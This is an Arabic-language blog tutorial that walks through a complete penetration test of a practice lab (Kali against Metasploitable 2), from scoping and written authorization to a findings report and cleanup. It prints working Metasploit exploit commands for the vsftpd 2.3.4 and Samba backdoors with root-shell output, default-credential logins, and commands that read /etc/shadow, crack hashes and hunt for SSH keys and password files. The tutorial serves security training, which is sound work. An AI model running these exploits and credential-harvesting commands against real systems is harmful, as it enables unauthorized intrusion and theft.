القائمة
نبذة عني الخدمات المسيرة اعمل معي
Security operations center
أمان مارس 8, 2026 • 30 دقائق للقراءة

The Full Audit: A Complete Penetration Test from Start to Finish

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

شارك:
Lee Foropoulos

Lee Foropoulos

30 دقائق للقراءة

مسار الهاكر: سلسلة من 5 أجزاء

الجزء الأول: المقدمةالجزء الثاني: إتقان Flipperالجزء الثالث: أساسيات Kaliالجزء الرابع: الاستغلالالجزء الخامس: التدقيق الكامل

بدأت هذه السلسلة وأنت تتساءل ماذا يفعل الهاكرز فعلياً. تعلمت أن الأمر ليس عن الهوديات والنصوص الخضراء على الشاشة. إنه حل منهجي للمشكلات. لقد استنسخت بطاقات دخول، ورسمت خرائط للشبكات، والتقطت مصافحات، وحصلت على shells في أجهزة معرضة للخطر.

الآن نجمع كل شيء معاً. هذه المقالة ستأخذك عبر اختبار اختراق كامل ضد هدف وهمي. كل مرحلة، كل قرار، كل اكتشاف، موثق تماماً كما يفعل المحترف.

السيناريو

العميل: Initech Labs (شركة تقنية صغيرة وهمية)

النطاق: اختبار اختراق الشبكة الداخلية

الهدف: تحديد نقاط الضعف وإظهار التأثير المحتمل على الأعمال

هدفك: شبكة مختبرك الخاصة (Kali + Metasploitable 2 + أي أجهزة افتراضية أخرى أعددتها)

احضر قهوتك. ستكون ممتعة.

المرحلة الأولى: ما قبل المشاركة

قبل لمس لوحة المفاتيح، يتعامل مختبرو الاختراق المحترفون مع الجانب التجاري. تخطَّ هذا، ولن تكون مختبر اختراق. ستكون مجرد شخص يرتكب جرائم.

مكالمة تحديد النطاق

في مشاركة حقيقية، ستجري مكالمة مع العميل لفهم:

  • ما الذي يدخل في النطاق؟ أي شبكات، نطاقات IP، تطبيقات؟
  • ما الذي خارج النطاق؟ أنظمة الإنتاج؟ خدمات الطرف الثالث؟
  • نافذة الاختبار؟ متى يمكنك الاختبار؟ ساعات العمل فقط؟
  • جهات الاتصال؟ بمن تتصل إذا تعطل شيء ما؟
  • الأهداف؟ علامة امتثال أم تحسين أمني حقيقي؟

لمختبرك

النطاق: شبكة مختبرك المعزولة فقط. خارج النطاق: كل شيء آخر على الأرض. نافذة الاختبار: متى شئت. الهدف: التعلم بالممارسة.

قواعد المشاركة

للمشاريع الحقيقية قواعد مكتوبة. إليك ما تغطيه عادةً:

  • خطاب التفويض - وثيقة موقعة تثبت أن لديك إذناً
  • إجراءات التصعيد - ماذا تفعل إذا وجدت شيئاً حرجاً
  • التعامل مع البيانات - كيفية التعامل مع البيانات الحساسة التي تصادفها
  • متطلبات التنظيف - إزالة جميع الأدوات والأبواب الخلفية عند الانتهاء
  • الجدول الزمني للتقرير - متى يجب تسليم التقرير النهائي؟

احصل دائماً على إذن مكتوب

حتى للاختبارات "الودية" على شبكة صديقك. بريد إلكتروني موقع يقول "لديك إذن لاختبار شبكتي من تاريخ إلى تاريخ" قد يكون الفرق بين تجربة تعليمية وإدانة جنائية. خذ هذا الأمر بجدية.

المرحلة الثانية: الاستطلاع

حان الوقت لمعرفة كل شيء عن الهدف. في مشاركة حقيقية، سيشمل ذلك OSINT (استخبارات المصادر المفتوحة): بحث Google، ملفات LinkedIn، مواقع الشركات، سجلات DNS. لمختبرنا، ننتقل مباشرة إلى الاستطلاع النشط.

الخطوة الأولى: اكتشاف الشبكة

السؤال الأول: ماذا يوجد في هذه الشبكة؟

bash# اعثر على نطاق شبكتك
ip a | grep inet
# ابحث عن شيء مثل: inet 192.168.56.100/24

# اكتشف جميع المضيفين النشطين
sudo nmap -sn 192.168.56.0/24 -oA discovery

# النتائج (مثال):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

وثّق كل شيء. أنشئ ملاحظة تبدو هكذا:

text# Initech Labs - اكتشاف الشبكة
# التاريخ: 2026-03-08
# المختبِر: اسمك

192.168.56.1   - البوابة/الموجّه
192.168.56.101 - غير معروف (يتطلب التحقيق)
192.168.56.102 - غير معروف (يتطلب التحقيق)

الخطوة الثانية: مسح المنافذ

الآن نتعمق أكثر. ما الخدمات التي تعمل؟

bash# مسح كامل للمنافذ مع اكتشاف الخدمات
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# هذا يستغرق وقتاً. للحصول على نتائج أسرع أثناء التعلم:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

على Metasploitable 2، سترى كنزاً:

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

يا للانكشاف. لنحدّث ملاحظاتنا:

text192.168.56.101 - خادم Linux (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # باب خلفي معروف!
  - SSH (22): OpenSSH 4.7p1      # قديم جداً
  - Telnet (23): نشط              # لماذا هذا موجود في 2026؟
  - HTTP (80): Apache 2.2.8      # تطبيقات ويب للاختبار
  - SMB (139/445): Samba 3.X     # منجم ذهب محتمل
  - MySQL (3306): 5.0.51a        # وصول لقاعدة البيانات؟
  - PostgreSQL (5432): نشط       # قاعدة بيانات أخرى

الخطوة الثالثة: تحديد نقاط الضعف

حان الوقت لمعرفة ما يمكن استغلاله فعلاً.

bash# شغّل سكربتات الثغرات
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# تحقق من خدمات محددة في Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

الباب الخلفي في vsftpd 2.3.4 يبرز فوراً. هذا shell مضمون. لكن مختبر الاختراق الجيد لا يتوقف عند أول اكتشاف. أنت توثق كل شيء.

غرفة خوادم بمعدات شبكة وامضة
الاستطلاع الشامل يرسم خريطة سطح الهجوم بالكامل قبل إطلاق أي استغلال. كل منفذ مفتوح وإصدار خدمة يصبح نقطة بيانات في تقييمك.

المرحلة الثالثة: الاستغلال

هنا تصبح الأمور مثيرة. لدينا عدة نقاط دخول محتملة. لنعمل عليها بشكل منهجي.

متجه الهجوم الأول: الباب الخلفي لـ FTP

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

الاكتشاف موثق: تم الحصول على root shell عبر الباب الخلفي لـ FTP. الوقت من أول مسح حتى الاختراق الكامل: حوالي 10 دقائق.

تم الحصول على root shell عبر الباب الخلفي لـ FTP. الوقت من أول مسح حتى الاختراق الكامل: حوالي 10 دقائق.

لكننا لا نتوقف هنا. إلى أين يمكننا الدخول أيضاً؟

متجه الهجوم الثاني: Samba

bash# أرسل الجلسة الحالية للخلفية
background

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

root shell أخرى عبر متجه مختلف. هذان مساران مستقلان للاختراق الكامل.

متجه الهجوم الثالث: تطبيقات الويب

لنتحقق مما يعمل على المنفذ 80.

bash# عدّد مجلدات الويب
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

# النتائج:
/cgi-bin/     (Status: 403)
/dav/         (Status: 301)
/icons/       (Status: 301)
/index        (Status: 200)
/phpMyAdmin/  (Status: 301)
/phpinfo      (Status: 200)
/test/        (Status: 301)
/twiki/       (Status: 301)

# شغّل nikto لمزيد من الاكتشافات
nikto -h http://192.168.56.101

phpMyAdmin ببيانات اعتماد افتراضية؟ لنتحقق:

text# جرّب بيانات الاعتماد الشائعة
Username: root
Password: (فارغة)

# تم منح الوصول!

وصول مسؤول قاعدة البيانات بدون كلمة مرور. من هنا، يمكننا تفريغ جميع البيانات، أو تعديل السجلات، أو استخدام عمليات الملفات في MySQL لكتابة web shell.

متجه الهجوم الرابع: بيانات اعتماد SSH الضعيفة

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

بيانات الاعتماد الضعيفة تمنح وصول SSH. ليس root، لكننا سنتعامل مع ذلك في مرحلة ما بعد الاستغلال.

المرحلة الرابعة: ما بعد الاستغلال

لدينا وصول. ماذا الآن؟ اختبار الاختراق الحقيقي يُظهر التأثير على الأعمال. ماذا يمكن للمهاجم أن يفعل فعلاً بهذا الوصول؟

جمع بيانات الاعتماد

bash# من root shell الخاصة بنا
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::

# احفظها لكسرها دون اتصال
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

# على Kali، اكسرها
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

استطلاع الشبكة (من الداخل)

bash# ما الشبكات الأخرى التي يمكن لهذا الجهاز الوصول إليها؟
ifconfig
route -n
cat /etc/hosts
arp -a

# ماذا يتصل بهذا الجهاز؟
netstat -tulpn
ss -tulpn

# ابحث عن مفاتيح SSH (للتحرك الجانبي)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

اكتشاف البيانات الحساسة

bash# ابحث عن ملفات مثيرة للاهتمام
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null

# تحقق من مواقع التكوين الشائعة
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf

# تعداد قواعد البيانات
mysql -u root -p  # جرّب كلمة مرور فارغة
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

تصعيد الصلاحيات (من msfadmin)

تذكر تسجيل الدخول عبر SSH كـ msfadmin؟ لنصعّد إلى root باستخدام ما تعلمناه في الجزء الرابع.

bash# ادخل عبر SSH كـ msfadmin
ssh [email protected]

# تحقق من صلاحيات sudo
sudo -l
# (المخرجات تختلف، لكن لنتحقق من متجهات أخرى)

# ابحث عن ملفات SUID
find / -perm -4000 2>/dev/null

# ابحث عن سكربتات قابلة للكتابة يشغّلها root
cat /etc/crontab

# حمّل وشغّل LinPEAS للفحص الشامل
# (في السيناريو الحقيقي، تمت تغطيته في الجزء الرابع)
محترف يعمل على مكتب بأدوات أمن سيبراني
ما بعد الاستغلال يُظهر التأثير الحقيقي على الأعمال. الفرق بين مسح الثغرات واختبار الاختراق هو إثبات ما يمكن للمهاجم فعله فعلاً عند حصوله على الوصول.

المرحلة الخامسة: التوثيق والنتائج

الاختبار بلا فائدة بدون تقرير. هذا ما يفصل المحترفين عن المقلدين. تحتاج أن تشرح ماذا وجدت، ولماذا هو مهم، وكيف يُصلح.

ملخص النتائج

إليك ما وجدناه في شبكة "Initech Labs"، منسقاً كما سيظهر في تقرير حقيقي:

حرج: باب خلفي لخدمة FTP (CVE-2011-2523)

النظام المتأثر: 192.168.56.101

الخطر: تنفيذ كود عن بُعد بدون مصادقة بصلاحيات root

الدليل: تم الحصول على root shell كامل في أقل من 60 ثانية

التوصية: تحديث vsftpd فوراً إلى الإصدار الحالي أو تعطيل خدمة FTP بالكامل.

حرج: تنفيذ كود عن بُعد عبر Samba

النظام المتأثر: 192.168.56.101

الخطر: تنفيذ كود عن بُعد بدون مصادقة بصلاحيات root

الدليل: تم الحصول على root shell كامل عبر استغلال usermap_script

التوصية: تحديث Samba إلى الإصدار الحالي. تقييد وصول SMB للأنظمة الضرورية فقط.

عالي: وصول MySQL Root بدون كلمة مرور

النظام المتأثر: 192.168.56.101

الخطر: اختراق كامل لقاعدة البيانات، سرقة بيانات، نشر web shell

الدليل: تم تسجيل الدخول كـ root بكلمة مرور فارغة عبر phpMyAdmin

التوصية: تعيين كلمة مرور قوية لـ root. تقييد وصول phpMyAdmin. النظر في إزالة phpMyAdmin بالكامل.

عالي: بيانات اعتماد SSH ضعيفة

النظام المتأثر: 192.168.56.101

الخطر: وصول مصادق عليه يؤدي إلى تصعيد الصلاحيات

الدليل: msfadmin:msfadmin تمت المصادقة بنجاح

التوصية: فرض سياسة كلمات مرور قوية. تطبيق مصادقة مفتاح SSH. النظر في fail2ban.

متوسط: خدمة Telnet مُفعّلة

النظام المتأثر: 192.168.56.101

الخطر: بيانات الاعتماد تُنقل بنص واضح

الدليل: المنفذ 23 مفتوح ويقبل الاتصالات

التوصية: تعطيل Telnet. استخدام SSH لجميع الإدارة عن بُعد.

منخفض: صفحة phpinfo() مكشوفة

النظام المتأثر: 192.168.56.101

الخطر: كشف المعلومات يساعد في هجمات لاحقة

الدليل: http://192.168.56.101/phpinfo متاح بدون مصادقة

التوصية: إزالة أو تقييد الوصول إلى صفحات phpinfo.

الملخص التنفيذي

هذا ما يقرأه المديرون فعلاً. اجعله قصيراً ومؤثراً وبدون مصطلحات تقنية:

الملخص التنفيذي

خلال اختبار اختراق الشبكة الداخلية لـ Initech Labs، حقق فريق الأمن سيطرة إدارية كاملة على الخادم الرئيسي خلال 10 دقائق من بدء التقييم.

النتائج الرئيسية:

10 min
الوقت من أول مسح حتى اختراق root كامل على خادم بخدمات غير محدّثة.
  • ثغرتان حرجتان تسمحان بالسيطرة الفورية عن بُعد
  • مشكلتان عاليتا الخطورة تكشفان قواعد البيانات وبيانات اعتماد المستخدمين
  • اكتشافات متعددة متوسطة ومنخفضة تشير إلى فجوات أمنية منهجية

الخلاصة: مهاجم ذو مهارات أساسية يمكنه اختراق هذا النظام بالكامل في غضون دقائق. المعالجة الفورية مطلوبة لجميع النتائج الحرجة والعالية. يُوصى بتقييم متابعة بعد تطبيق الإصلاحات.

المرحلة السادسة: التنظيف والإغلاق

مختبر الاختراق المحترف يترك البيئة تماماً كما وجدها.

bash# وثّق جميع الجلسات
msf6 > sessions -l

# أنهِ جميع الجلسات
msf6 > sessions -K

# على الهدف (إذا أنشأت أي ملفات):
rm /tmp/linpeas.sh
rm /tmp/*.txt

# احذف أي مستخدمين أنشأتهم
userdel testuser

# احذف أي مفاتيح SSH أضفتها
rm /home/*/.ssh/authorized_keys

# وثّق كل ما حذفته

في مشاركة حقيقية، ستفعل أيضاً:

  • إزالة جميع الأدوات المرفوعة أثناء الاختبار
  • توثيق أي تغييرات أُجريت على البيئة
  • تقديم هاشات/checksums لأي بيانات استخرجتها
  • حذف جميع بيانات العميل بأمان بعد تسليم التقرير

قائمة المنهجية الكاملة

إليك سير عملك القابل لإعادة الاستخدام لأي اختبار اختراق:

منهجية اختبار الاختراق

  1. ما قبل المشاركة
    • تحديد النطاق وقواعد المشاركة
    • الحصول على تفويض مكتوب
    • إنشاء قنوات اتصال
    • إعداد بيئة الاختبار
  2. الاستطلاع
    • اكتشاف الشبكة (تعداد المضيفين)
    • مسح المنافذ وتحديد الخدمات
    • مسح الثغرات
    • تعداد تطبيقات الويب
    • توثيق كل شيء
  3. الاستغلال
    • التحقق من الثغرات (لا تثق بالماسحات بشكل أعمى)
    • استغلال الثغرات المؤكدة
    • توثيق كل اختراق ناجح
    • التقاط الأدلة (لقطات شاشة، سجلات)
  4. ما بعد الاستغلال
    • تعداد النظام المخترق
    • جمع بيانات الاعتماد
    • تحديد البيانات الحساسة
    • محاولة تصعيد الصلاحيات
    • البحث عن فرص التحرك الجانبي
  5. التقرير
    • كتابة ملخص تنفيذي (التأثير على الأعمال)
    • توثيق جميع النتائج مع الأدلة
    • تقديم توصيات المعالجة
    • تضمين التفاصيل التقنية لفرق تقنية المعلومات
  6. التنظيف
    • إزالة جميع الأدوات والآثار
    • إنهاء جميع الجلسات والأبواب الخلفية
    • توثيق أي تغييرات في البيئة
    • التعامل مع بيانات العميل بأمان
خطة عمل التدقيق الكامل 0/6

ما التالي: طريقك للأمام

لقد أكملت مسار الهاكر. انتقلت من "ماذا يعني الاختراق حتى" إلى إجراء اختبار اختراق كامل. هذا مثير للإعجاب حقاً.

لكن هذه مجرد البداية. إليك أين تتجه بعد ذلك:

منصات التدريب

  • Hack The Box - أجهزة واقعية للتدريب. ابدأ بالأجهزة المتقاعدة "السهلة".
  • TryHackMe - مسارات تعلم موجهة. ممتازة للتقدم المنظم.
  • VulnHub - أجهزة افتراضية مجانية معرضة للخطر للتحميل والتدريب محلياً.
  • PentesterLab - التركيز على أمن تطبيقات الويب.

الشهادات (إذا أردتها)

  • eJPT (eLearnSecurity Junior Penetration Tester) - نقطة بداية ممتازة، امتحان عملي
  • OSCP (Offensive Security Certified Professional) - معيار الصناعة، صعب لكنه محترم
  • PNPT (Practical Network Penetration Tester) - حديث، عملي، يشمل كتابة التقارير
  • CEH (Certified Ethical Hacker) - علامة تأشير للوظائف المؤسسية، أقل عملية

التخصصات

  • أمن تطبيقات الويب - OWASP، Burp Suite، حقن SQL، XSS
  • Active Directory - معظم بيئات الشركات تعمل عليه
  • الأمن السحابي - اختبار اختراق AWS، Azure، GCP
  • أمن الهواتف - اختبار تطبيقات Android/iOS
  • Red Teaming - محاكاة كاملة للخصم، مادية + رقمية
  • الهندسة العكسية - تحليل البرامج الضارة، تطوير الاستغلالات

ابنِ مختبرك المنزلي

أفضل مختبري الاختراق لديهم مختبرات منزلية متطورة. ابدأ ببساطة وتوسّع:

  • أضف Windows Server مع Active Directory
  • أعدّ متحكم نطاق
  • انشر تطبيقات ويب معرضة للخطر (DVWA، bWAPP، WebGoat)
  • ابنِ شبكة بعدة أقسام
  • أضف HoneyAegis لرؤية الهجمات من منظور المدافع

مسار الهاكر: مكتمل

لقد نجحت. جميع الأجزاء الخمسة، من الفضول إلى القدرة.

الجزء الأول: المقدمة الجزء الثاني: إتقان Flipper الجزء الثالث: أساسيات Kali الجزء الرابع: الاستغلال الجزء الخامس: التدقيق الكامل

السلسلة مكتملة - رحلتك

الجزء الأول: تعلمت ما هو الاختراق حقاً وحققت انتصاراتك الأولى مع Flipper Zero

الجزء الثاني: أتقنت كل بروتوكول في Flipper: Sub-GHz، RFID، NFC، BadUSB، GPIO

الجزء الثالث: بنيت مختبر Kali الخاص بك، تعلمت nmap، والتقطت مصافحات WiFi

الجزء الرابع: أتقنت Metasploit، الاستغلال، تصعيد الصلاحيات، والتمحور

الجزء الخامس: جمعت كل شيء في منهجية اختبار اختراق كاملة

الأمن ليس وجهة. إنه ممارسة. الأدوات ستتغير، والثغرات ستتطور، لكن المنهجية تبقى كما هي. شكّك في كل شيء. وثّق كل شيء. لا تتوقف أبداً عن التعلم.

مرحباً بك في الجانب الآخر.

  • Lee
How was this article?

شارك

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

La tufawwit ay maqal

Ihsal ala isharat inda nashr maqalat jadida. La yulzam barid iliktiruni.

Satara laafita fil mawqi inda wujud maqal jadid, wa ishaar min almutasaffih idha samahta.

Isharat almutasaffih faqat. Bidun rasail muzaaja.